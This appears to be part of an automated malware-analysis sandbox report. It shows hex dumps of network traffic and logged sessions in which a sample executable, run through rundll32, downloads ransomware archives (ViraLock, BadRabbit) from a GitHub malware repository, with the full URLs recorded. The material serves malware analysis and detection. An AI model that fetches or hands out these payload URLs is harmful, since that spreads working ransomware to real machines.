                                                                                                                                                2022-09-29 12:48:59 UTC3933INData Raw: 76 ac 5c f3 6e d8 9f b9 5c 7f f0 36 cb da 1a 46 37 1c 6f 0c 6f 56 0f 96 70 f3 a1 8d 63 5e 1f 59 57 ae 40 d7 99 ad b6 f7 f1 87 a4 92 b3 11 da cb f4 c2 43 fa d8 f9 bf 63 23 1c 90 97 0e f9 0e 66 ba 1c c3 98 48 e1 80 85 84 31 23 00 20 e0 72 72 c6 41 d9 d1 3c 7c 2a 87 80 4e 41 3c 14 a2 bf db 2c 32 82 16 69 6e 36 db a9 03 22 3e a2 2c cf 3e 7a e1 64 f6 94 ba 0b ac 95 fb 19 d9 0e 22 d5 42 19 80 a2 5c 18 c5 62 bf df ef 4c 75 ae a8 41 96 51 ec f2 f7 49 4f d3 15 42 f5 da 96 f6 fd 4e c0 ee b7 1b c9 5c a4 ef f6 b5 05 64 84 92 7a e1 34 2b 58 4e 1f 13 eb 64 01 f1 d8 87 d0 69 d8 e1 f6 f2 57 ed f7 60 ef 2e e8 02 a8 f9 88 cf ad b3 eb 07 61 7c 59 cf e5 c0 4d 87 72 ea 63 54 ec c9 0c 0f a9 07 6b 69 0b 24 46 9d 21 a6 ee 1a 60 38 98 59 6d 81 31 d4 78 5a 8c 83 38 48 e0 70 a6 a3
                                                                                                                                                Data Ascii: v\n\6F7ooVpc^YW@Cc#fH1# rrA<|*NA<,2in6">,>zd"B\bLuAQIOBN\dz4+XNdiW`.a|YMrcTki$F!`8Ym1xZ8Hp
                                                                                                                                                2022-09-29 12:48:59 UTC3949INData Raw: c7 44 b8 db 24 07 28 23 aa 14 81 35 34 69 cb 45 9d 44 ce 8c f5 58 0d ef aa b6 56 b0 54 09 54 75 69 d0 0a ea e0 ae 31 0b 9a a3 6b 15 10 4c f5 f7 3e 5d a1 89 a7 b3 c9 13 aa a9 d0 f1 49 da 66 59 3c cd 0e 44 63 f7 f2 f4 75 e7 a8 0d 4c 37 ef 87 08 df f9 b5 07 30 d6 68 62 b8 1f 4b 0b ae c2 2d e9 bf 32 41 58 38 9b 2c 29 8c 4f 2c 6c bd 86 db be f3 21 19 34 2c e2 d6 22 77 38 7a 46 02 67 31 82 b2 30 03 53 59 16 13 d7 8b 15 08 3f cb 3d fb c9 47 85 4f f0 2c c3 02 62 45 cc ca 86 3f 1d 46 14 ae 27 5f 87 a9 2e 1b ae 2b 6c 65 03 b0 bd d8 59 7b 37 d7 99 e3 3a 52 3c 07 5e b7 5a b2 ff ac bc 92 16 0e b3 5a a5 d8 dc f0 ef eb 6d 3d 60 0b 9a c7 68 05 38 25 85 a5 78 2a 9c 02 b2 86 4c 46 6e 3d 5d 69 ea bb 9f 3f fa 31 ce f2 4a d6 5e 7e 26 1d 9f 8c a8 ed 4a 1d 30 19 01 12 bc bd 84
                                                                                                                                                Data Ascii: D$(#54iEDXVTTui1kL>]IfY<DcuL70hbK-2AX8,)O,l!4,"w8zFg10SY?=GO,bE?F'_.+leY{7:R<^ZZm=`h8%x*LFn=]i?1J^~&J0
                                                                                                                                                2022-09-29 12:48:59 UTC3965INData Raw: bb 3c 0d b0 6e e9 3a a4 02 54 02 42 23 90 94 55 40 3b 52 24 94 8e e9 10 b0 38 b9 22 19 5e 87 48 d8 06 69 ac 59 2f 0a 7c c4 0b d7 70 9a d6 f2 6a a1 de d6 c1 17 f0 72 38 a4 b3 35 7f d1 24 e0 0b 4f 1e 57 51 e2 f9 5e 85 bb 23 ed 0a 95 20 e4 7c 88 c7 d0 d6 23 b5 42 96 c7 e5 ef dd e7 cf 85 03 47 5d 2d 2c f1 c7 14 e7 fd 81 32 e2 e6 e0 e8 0a 8c de 5c 5c 8e d5 38 7c c5 c9 2a ae c1 46 e2 ff 01 b8 bf d7 9b 88 2e 18 2b da c7 83 0c f9 04 8d c8 6e 96 83 47 bd d7 87 8e 16 7f 13 19 ce 1f 02 0d 26 b8 4f 21 f1 b7 55 4a 22 be df c2 3e 08 64 0e ab 9a 44 f5 20 b9 b8 5c 18 b7 5c 80 11 46 79 6b 97 7f f0 4f 9f db bc a7 f3 6d 2c 71 97 61 d1 a8 77 08 c1 d2 5f 4a 1f fc 4e 6f 2b a4 39 b3 f2 84 27 1d 20 de 31 ae d6 52 cb 96 38 69 bb 1f f9 ee f4 f5 e2 e3 79 fc 74 be fc 3c 30 fe 14 06
                                                                                                                                                Data Ascii: <n:TB#U@;R$8"^HiY/|pjr85$OWQ^# |#BG]-,2\\8|*F.+nG&O!UJ">dD \\FykOm,qaw_JNo+9' 1R8iyt<0
                                                                                                                                                2022-09-29 12:48:59 UTC3981INData Raw: f4 c4 97 8c ab 0c 02 e7 ef 50 bd 97 ad 04 00 d2 9d b3 b9 c2 bc 38 36 15 7f f1 ba b3 a0 f0 79 15 8b 1a 59 06 eb 3d f5 7c ef 84 26 e7 85 35 a5 4b d5 32 81 45 7d 1d db d2 28 1d a8 45 c5 2d 1d f5 60 cc aa dc 58 8a 71 68 f9 e8 3b 10 fe ce 12 9f 44 2f fe ad 2f cd 88 e8 ee c0 51 b3 b0 54 b4 55 7d e5 f4 26 27 c4 da 61 da 39 26 16 30 80 28 2f 7d af e1 6f 38 08 35 04 58 6d 26 a1 dc c0 c0 4b a6 6e 1d 61 26 19 b5 26 fe bd 8a a6 ae 70 4c a8 4d 96 87 a5 7b e7 3c 25 ad 23 cc d2 93 b4 07 c5 6f 4f 98 f6 22 db 90 82 e6 9a 14 c0 f5 fa 6b 9c 91 04 df 05 90 41 15 5f e2 87 49 5f 0e e4 e5 9c 91 e4 aa b6 c9 27 28 cf 78 5b b4 ec 78 0b 30 e1 8b 54 c4 ca a4 74 77 c6 24 47 fe 17 d4 33 08 be dc 59 03 cf d0 ba 08 37 a9 8c 56 7b 6e 05 08 ed e1 23 64 6b 64 9f d8 2f 05 9d f3 97 71 7e 10
                                                                                                                                                Data Ascii: P86yY=|&5K2E}(E-`Xqh;D//QTU}&'a9&0(/}o85Xm&Kna&&pLM{<%#oO"kA_I_'(x[x0Ttw$G3Y7V{n#dkd/q~
                                                                                                                                                2022-09-29 12:48:59 UTC3997INData Raw: ff 6e 9b e6 89 01 ac 33 42 41 93 cc 7c 77 e6 d7 8e 30 ad 3b 7b be ef 93 4c 5b 50 02 bf e8 e0 a6 48 b7 b9 a5 f7 3b 5b 02 8c de 48 9d 38 bc 21 d0 27 50 ee 92 3c b7 03 28 0f c1 01 73 07 88 59 9b 0a 7d 41 2d bd 8d 22 2a 64 e4 c7 9a 84 a9 f6 0f 68 5a ed 27 7e ec 6d b5 1d 41 36 37 8f 28 c6 a9 4d 43 10 ee f8 33 96 b7 48 cf 92 33 9b 81 ce d6 16 d7 52 b8 89 d4 e2 2f 2e 65 23 b9 a8 db 0b 3f 40 b0 c9 e9 b7 14 a7 77 23 27 4b 4b 33 7d fa 00 43 5b 2c 47 89 31 12 6c 46 33 99 e0 3f 8d 63 ac 0a 53 2b 70 98 57 92 a8 16 bd 02 a7 2a ce 41 a4 ee 60 03 2e 2a 85 6a 6b 2f 79 57 57 81 a3 58 12 85 cd 90 e2 13 3e 58 ef dd 52 9b 78 7a b5 d8 bc 01 39 cc 78 02 91 23 6a 52 da 02 20 9a 46 25 5b 43 d9 2f dd ac 43 8b 5e 4f ef 60 3c ba 80 a6 17 1f c8 5c 81 9c 3f c5 20 65 d8 26 4d a2 c6 2e
                                                                                                                                                Data Ascii: n3BA|w0;{L[PH;[H8!'P<(sY}A-"*dhZ'~mA67(MC3H3R/.e#?@w#'KK3}C[,G1lF3?cS+pW*A`.*jk/yWWX>XRxz9x#jR F%[C/C^O`<\? e&M.
                                                                                                                                                2022-09-29 12:48:59 UTC4013INData Raw: 82 9e 8b cb a8 61 13 ce 71 e3 0b c7 1d d5 29 9f 3c 60 09 1c e7 ea 94 7e 33 10 df b3 2c a7 aa 8e bd 74 28 72 8c 62 cb 06 ca 47 f5 19 8e c2 a7 71 83 3b c5 26 3b 14 84 10 f0 b7 52 d6 78 3b 41 4f 88 ed 18 c6 de a8 0a 83 54 28 1d 00 20 8a 0a e8 ca b9 95 07 f0 d2 82 b0 89 85 93 f8 fd 44 9c 22 c8 19 e5 f7 f1 94 03 1f 91 3d 46 6a c8 73 70 9b ac b3 d2 78 de 7d bb 9e 3a 01 c4 5a 96 e1 a8 e9 53 ea 15 35 f4 e4 75 d7 4a 82 a8 94 4a cd 3d eb 69 9d 30 4f 07 1f b0 81 79 92 1e c9 72 10 60 41 d8 ee 5d 95 d8 85 5f 0f 35 60 5e c8 6c 95 85 e8 1b fc 0d b4 78 1a 84 29 4a 9b 85 5f a8 6d 87 5a 4d d2 01 5f 53 47 01 89 0b 59 e2 b4 66 83 63 0e c3 fc 7f 1e ff a3 a1 a6 13 b5 49 88 72 b6 2b 03 69 18 56 53 b8 ea 86 5c 98 f8 1f 64 87 d3 5e 10 d3 61 98 71 71 2d a5 95 50 0e ee 84 55 c5 17
                                                                                                                                                Data Ascii: aq)<`~3,t(rbGq;&;Rx;AOT( D"=Fjspx}:ZS5uJJ=i0Oyr`A]_5`^lx)J_mZM_SGYfcIr+iVS\d^aqq-PU
                                                                                                                                                2022-09-29 12:48:59 UTC4029INData Raw: f2 a8 02 c0 54 c8 fc c8 70 0f 4f a4 f3 74 53 06 1b 10 e7 28 d5 08 17 2b b8 9a 6b d6 c9 61 89 49 6e 0b 29 c1 c2 c8 20 54 3f 6b 8f 64 c1 eb 28 b4 f8 96 ac ab 0d 05 95 89 40 ae 2e 11 9c d1 ab 4a c7 33 d2 c9 cd fd 1e fc 60 a0 10 a9 54 86 7c 35 d4 1f b3 35 f1 4d f0 79 98 fd 79 97 0d ed 6f 52 93 5e dc 50 22 1e 55 5d 0e 10 c6 a2 a3 4b 71 a0 a8 ee 1f b7 f9 37 9c 8a d1 94 ee 23 0a 3e 30 b1 d2 31 a7 fc f2 45 ba 7c 7c ab cd f8 13 b4 bb 32 cf 78 c3 60 d6 e9 ec 5b a7 01 03 dd 12 27 b4 5b 01 f9 59 76 60 c2 55 a8 79 8f e8 5f d6 12 f7 dc da 8d 4e 2c 7c b4 2c 78 62 1d 41 8a e3 89 24 4d c3 85 3c 4a 2f 53 39 0a 5d 5a b7 d4 2d 4a ef 4e 86 46 33 44 8e 37 cc 44 de db e5 d6 0a 98 5e 7c 90 71 48 35 5e 3f 30 65 d2 b7 a9 fb c3 34 63 d6 31 45 39 25 ff 35 84 ce 8f 3a 97 da c8 7b c2
                                                                                                                                                Data Ascii: TpOtS(+kaIn) T?kd(@.J3`T|55MyyoR^P"U]Kq7#>01E||2x`['[Yv`Uy_N,|,xbA$M<J/S9]Z-JNF3D7D^|qH5^?0e4c1E9%5:{
                                                                                                                                                2022-09-29 12:48:59 UTC4045INData Raw: 8f ae 0b 42 82 60 29 5c da 6d c4 ec 3e 8e d7 4e d9 f2 9f a9 3b 1d 34 25 06 b8 c4 53 06 e5 36 19 a2 50 3f 8c c5 4f f6 1a 8d 7a cc 0d 0f b6 14 ea a7 d5 d8 4e ba 4f 21 93 67 53 e0 80 23 f0 2f b6 80 36 92 7b 31 35 ba e2 96 72 fd 9b dc 51 b8 11 9c 6c 91 4a ef ee 56 ed ad da 4a 3d 17 ab 16 36 6f 73 54 a1 83 58 e8 7d 25 a5 92 b9 16 f8 40 bb 16 8b e0 45 72 9a ff 14 b6 3c 0b b1 af e8 50 dc df 57 af 58 19 36 bb 1f d4 2c 4a 27 3c f4 0e 1a d6 ac af 57 b7 4c 95 ef 03 7e 47 96 ca 66 b4 67 f7 45 2d bd 23 22 2c 00 43 1d b3 cc 13 41 3b cc 29 29 90 36 ee 7d ef 99 cb 7a a0 1e 70 e1 e7 c0 f3 e8 d8 ef a8 87 7a 4d d1 37 42 06 f0 65 ec f7 26 cc 28 27 96 7c b4 1a 6b a7 8d 74 ce 5f e3 94 45 5c 43 30 e1 83 74 cd d2 e2 7d 64 56 3d db fd e8 d8 4e 32 43 2e 06 92 11 ed 2b f9 2a 6a e6
                                                                                                                                                Data Ascii: B`)\m>N;4%S6P?OzNO!gS#/6{15rQlJVJ=6osTX}%@Er<PWX6,J'<WL~GfgE-#",CA;))6}zpzM7Be&('|kt_E\C0t}dV=N2C.+*j
                                                                                                                                                2022-09-29 12:48:59 UTC4061INData Raw: a8 94 a1 5e 61 ca 64 bc 84 22 23 10 16 73 c5 e2 ca f4 5c da 53 0e 0c 31 db 23 f9 3f e8 e7 fc 78 7e e6 db e4 4b ba 24 22 51 c0 9c d2 cb ac 2a 45 12 8b f6 80 70 1e 0b 02 7c 25 a5 49 4b c7 8e 07 9d ed 04 07 90 0c b1 de 8a 71 5e e8 c8 82 0c 94 d6 7d 4c 67 0f 9d 82 e1 b4 f7 21 d0 4a 64 05 ef 69 28 d5 df c0 2c d4 58 a7 2b fc c7 e5 8f 42 34 1d 4a b5 1c 79 28 7f 4a c7 53 5f e8 53 ca 9d 45 e7 ce 70 09 20 50 dd 72 8a aa cf ee b3 5c 9d e3 02 80 3f 3a 06 36 43 42 22 d1 4e dd c6 21 ff cb fa 42 03 76 be 9c 88 b1 81 a6 65 91 1a 19 25 2b 96 90 f2 af 78 40 01 36 ca 53 c0 74 fd 58 55 0e 82 fd 80 e1 d6 6d 37 12 a4 b8 c7 85 92 84 2f e4 cc 6e 90 e4 25 48 de 07 94 9e 6b d1 ad b0 83 d7 00 29 7f 46 63 6d b6 6f 6d dd 13 0f 14 f9 d8 9f 5a e6 e6 9c 46 17 39 48 a0 b9 27 04 4a 1c ce
                                                                                                                                                Data Ascii: ^ad"#s\S1#?x~K$"Q*Ep|%IKq^}Lg!Jdi(,X+B4Jy(JS_SEp Pr\?:6CB"N!Bve%+x@6StXUm7/n%Hk)FcmomZF9H'J
                                                                                                                                                2022-09-29 12:48:59 UTC4077INData Raw: d3 c3 9c b0 54 fd dc 1b cd b3 72 1d 5d 67 cb 9f 07 dd 27 b3 2a 15 d1 7d 6d ab 3d cf 91 d4 de 44 79 95 83 73 b6 12 97 ce 48 78 5c 28 d3 52 d4 2a 62 cd 19 db 63 67 1b 0d 4f 02 09 47 c4 8d 2b 74 36 bd 13 c6 f5 d8 18 9f 2d 58 9b 8d 12 97 96 af 7b e2 db 95 bf 10 36 c2 20 04 8e 42 85 71 0d f9 a0 8b 5b 07 c9 4c 6d 25 02 5e c6 df b4 73 87 48 a0 4e 52 28 b8 a1 6f af ba 68 2e 95 2f 15 43 61 0b be 3c 24 57 25 22 e3 68 cc 04 26 c6 e9 12 6f 5b 21 3c 46 12 60 ae 16 80 10 a6 48 b8 0b 6d b1 50 3e 74 30 cd a2 52 15 8f 1e b7 aa ed 86 75 66 c9 c0 9d d2 a1 6f 16 d3 f5 a9 3d aa 04 72 d8 8e 54 47 c0 ae 03 c1 40 c4 94 4d 97 3a 63 bd 73 45 58 de 58 e9 0c 88 2a c1 f7 f6 ce 1b 24 7e a6 63 2a 93 1b 12 f6 f1 b5 07 6b 31 0d 6c 36 cc f8 dc 2a a9 bb 14 01 5a bb 66 15 ce ed dc 90 48 f9
                                                                                                                                                Data Ascii: Tr]g'*}m=DysHx\(R*bcgOG+t6-X{6 Bq[Lm%^sHNR(oh./Ca<$W%"h&o[!<F`HmP>t0Rufo=rTG@M:csEXX*$~c*k1l6*ZfH
                                                                                                                                                2022-09-29 12:48:59 UTC4093INData Raw: 86 94 08 3a 0b ac e6 07 ef b9 d1 dd f3 bc 0a d2 3d 04 5e c0 c3 1e 93 a5 42 b6 2d 8c cf 1a ba 6f ad aa 0c 55 1e 9c 9a fd 25 4b aa eb 5e ec 76 75 3b e0 0d 25 51 52 c7 88 c5 d0 c3 70 e9 8f 2c 16 0f 51 bd 7e 48 65 51 f4 71 54 36 c3 1d a1 10 4e 5a 10 0f 04 ae fb fd 44 ed 5c a9 00 f0 7f bb a2 76 b2 0a 93 9c 03 67 59 f8 67 58 46 af be b0 b8 d6 95 77 f8 76 cb 0b e9 9f 1a 62 67 13 fe 5b 19 46 56 98 41 73 4b a8 5e 76 91 7e dc 17 1f 57 c4 35 1e 5b d4 2b dd 9d ef 65 95 a6 e0 49 d2 e4 e3 dc a4 d4 df 06 d8 2f dd 54 cf 66 b9 c4 c6 9a df 4a c5 6b 20 4b 36 9a 65 21 0d 03 de 63 34 4b c6 75 e3 9b 3f e5 3a 93 45 d0 0a 8e 8b 60 e8 14 7c 44 9d 9c a6 b9 c3 83 ad fa eb b5 2e f4 21 ee 9d 69 c0 e8 dc c6 fa 1d 1b 82 cd 0d 35 57 be cd e1 76 fe 98 ea 8e 7d be 74 23 70 4f 70 8b d7 54
                                                                                                                                                Data Ascii: :=^B-oU%K^vu;%QRp,Q~HeQqT6NZD\vgYgXFwvbg[FVAsK^v~W5[+eI/TfJk K6e!c4Ku?:E`|D.!i5Wv}t#pOpT
                                                                                                                                                2022-09-29 12:48:59 UTC4109INData Raw: 46 cc 14 a8 15 51 98 f2 42 16 92 21 38 7b 8b a4 4f 20 5d ac 27 f7 81 c7 f9 77 ff 14 cd 86 ab 4c 26 53 25 4c 8b 59 4e 96 50 3e 87 3b 0a 94 62 83 ae 87 c1 f6 17 f2 7e 6a 7a eb 09 a2 fa 0c c4 32 a7 63 e4 ea 82 a7 e1 36 41 33 18 e8 a0 52 11 75 89 3d e4 31 c4 e9 78 b4 02 43 b3 a8 bc b8 2d 4f dc 1f 8d 45 0c 24 5c 9b 4d 9b 0e 5b c5 b0 40 30 46 61 ca 1e b1 0d 65 1b b6 03 05 7c 74 4a 39 bf 40 ae f8 f9 09 15 9e 00 b1 59 be ba 5f 3d c8 67 73 55 75 50 98 e4 67 4c e7 41 0c 4d 0a 02 9e aa ae 3b b1 9d bf 13 ad 7e 82 92 87 36 01 af f2 1c dc e8 cd 73 f9 69 61 6a 89 55 aa df 8f 5b 3b cc d9 2d 7b a7 21 bf 18 4d 6f 5f a9 62 13 33 2b 1f d4 a4 c8 09 84 1a e0 c0 75 5e 1f 05 9f 0c 37 4f 83 30 57 d4 5e cf af 8b 57 38 2f 2a e3 30 18 d1 01 28 27 e2 9b e8 1b e1 89 de d6 9e 75 07 3b
                                                                                                                                                Data Ascii: FQB!8{O ]'wL&S%LYNP>;b~jz2c6A3Ru=1xC-OE$\M[@0Fae|tJ9@Y_=gsUuPgLAM;~6siajU[;-{!Mo_b3+u^7O0W^W8/*0('u;
                                                                                                                                                2022-09-29 12:48:59 UTC4125INData Raw: a1 43 0a 2c f9 4d 53 60 3e fc 46 a1 bd 05 36 d9 bf a0 67 f9 19 bb ca 5a 18 6e 40 76 34 8f fb 82 8b ba 7c d8 c0 8c 5b 75 34 bc e3 99 f5 7e ed 8e f4 49 83 a5 cd 20 6e 8d 63 92 9e 39 5c 0d 90 aa a8 16 b8 64 5d 9b 94 a6 6c c8 75 62 39 41 13 a9 79 62 25 40 c1 33 ad 71 bd 76 2d 24 c1 08 41 53 e2 15 ef a2 79 bf e5 b4 90 b0 42 fd 03 b3 4d 73 53 36 ac d5 34 9c 08 de 4c 9c b1 ac 2a 01 1a bc 7d 2f 6f d0 4a 39 6a 54 5f 27 b8 bf a5 dd 29 15 4c 09 5a 97 f6 d5 c7 04 ec a7 c9 f8 56 da ce cf 6b a4 b2 02 d0 94 08 f9 02 56 f1 78 4f 5e 5a 51 8b 79 71 34 d5 76 a1 52 69 61 59 c8 93 53 fb b7 09 9f 09 cc 00 9c e6 fb 8a 02 7d 98 9e 23 1d 49 96 ac af 2f 71 cd c4 8b a1 66 89 8b 46 57 3e 16 9d 8f bb 00 be e0 d4 a3 bf 10 09 c0 8e 51 be da 87 a7 fc 13 a2 b6 71 3c 08 4e 45 aa 86 37 db
                                                                                                                                                Data Ascii: C,MS`>F6gZn@v4|[u4~I nc9\d]lub9Ayb%@3qv-$ASyBMsS64L*}/oJ9jT_')LZVkVxO^ZQyq4vRiaYS}#I/qfFW>Qq<NE7
                                                                                                                                                2022-09-29 12:48:59 UTC4141INData Raw: 97 44 d1 de ea 9f e4 82 24 1d 3c 43 f5 c1 1f 0a 1f 1d 05 8e 33 77 34 dd bb 00 f8 64 45 9a 96 00 8c 24 5f 30 3c 87 99 82 57 56 98 49 e6 33 21 e6 a2 86 5e 4f 61 ad 71 6b 2a 06 20 6c fd be 6a 5b 6c f3 84 5c 3e 74 94 71 00 e0 55 92 7e de 45 37 a2 01 bc 04 af 9f 66 97 cb 50 5d 95 cb cb ce e0 9d 39 96 8f ed 02 4f cc eb 59 61 4f 88 fa 7f 82 f1 0e a3 b0 a3 d3 da fd 1c aa b6 ba 1f 9a 18 8c f4 67 00 af e2 49 57 0e 70 1a d0 a0 c3 72 f5 a4 e9 61 53 5d ec 74 fe 84 40 f2 27 4e cd b6 88 60 a2 ba 0e a1 65 ca c3 29 a8 b4 90 2c e8 45 f9 ac e9 6f b9 09 4a bb 14 72 3c e7 07 58 2a 1e 86 cb 6c 83 36 0e a9 5c 14 a7 4a 2f 90 2c 97 e4 55 cc 57 d8 1f 8e 00 c6 13 29 d7 1e 42 b8 d9 61 d9 3b 65 46 ad 00 23 dc 2f ed 17 8f 84 11 17 51 49 93 a5 43 48 23 1b 34 24 68 3d 66 02 8e 38 fb 99
                                                                                                                                                Data Ascii: D$<C3w4dE$_0<WVI3!^Oaqk* lj[l\>tqU~E7fP]9OYaOgIWpraS]t@'N`e),EoJr<X*l6\J/,UW)Ba;eF#/QICH#4$h=f8
                                                                                                                                                2022-09-29 12:48:59 UTC4157INData Raw: c1 98 72 a6 70 62 59 62 0b 73 0c 91 06 d0 07 bd 70 bf 98 c0 3d e2 a0 00 b4 b1 d4 89 2c 6c a6 63 f5 ba 1e a3 a2 2b a7 6a c1 be 12 ab 49 4b a0 e5 6f c3 eb 6b e0 a8 16 1b 33 6b 7f 6d 29 45 b8 7a 25 26 f8 c0 89 1f 98 8d 32 e8 29 b0 ca 72 26 73 6f 6a 23 2c d6 5e c2 6a 1b 3f 25 f5 52 bb ba ec b6 26 9a 25 1d 31 ba b7 c3 ec c9 66 6a 15 6a 83 82 4c b2 0c 4b b0 32 21 c5 3c 8a cc 00 f1 08 cc 3c cc 8c b3 26 23 20 b5 c0 77 06 0b 1e b5 28 67 6f d7 ce 2a 7a 8c 46 a7 79 36 d8 5d c7 1c 4f 9e b4 16 16 cc 0e ee df b7 5f ae f5 83 42 b8 d5 9e d4 9c 6d af 94 56 08 a4 6e 4f 65 bf f9 9e 31 a3 1e 1c 19 1d 8d da 2b 61 62 d5 57 5d c9 a7 04 30 62 94 1d 32 37 83 9c d7 e9 ae 66 ef b7 91 23 c5 8c 10 01 be da 96 2f 57 08 92 cd a2 9d 94 bb d9 c1 89 8b 8e ae 1f 62 f4 dc d4 a3 dc b6 44 8b
                                                                                                                                                Data Ascii: rpbYbsp=,lc+jIKok3km)Ez%&2)r&soj#,^j?%R&%1fjjLK2!<<&# w(go*zFy6]O_BmVnOe1+abW]0b27f#/WbD


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                48192.168.2.349735140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:25 UTC4165OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                49140.82.121.4443192.168.2.349735C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:25 UTC4165INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:25 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:49:25 UTC4165INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                5140.82.121.4443192.168.2.349685C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:20 UTC180INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:20 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:20 UTC181INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                50192.168.2.349737185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:25 UTC4167OUTGET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                51185.199.108.133443192.168.2.349737C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:25 UTC4167INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 135339
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "2bb1943793128dcdbc238f30e0779c2b1525b546f66d38117659df251eb89cab"
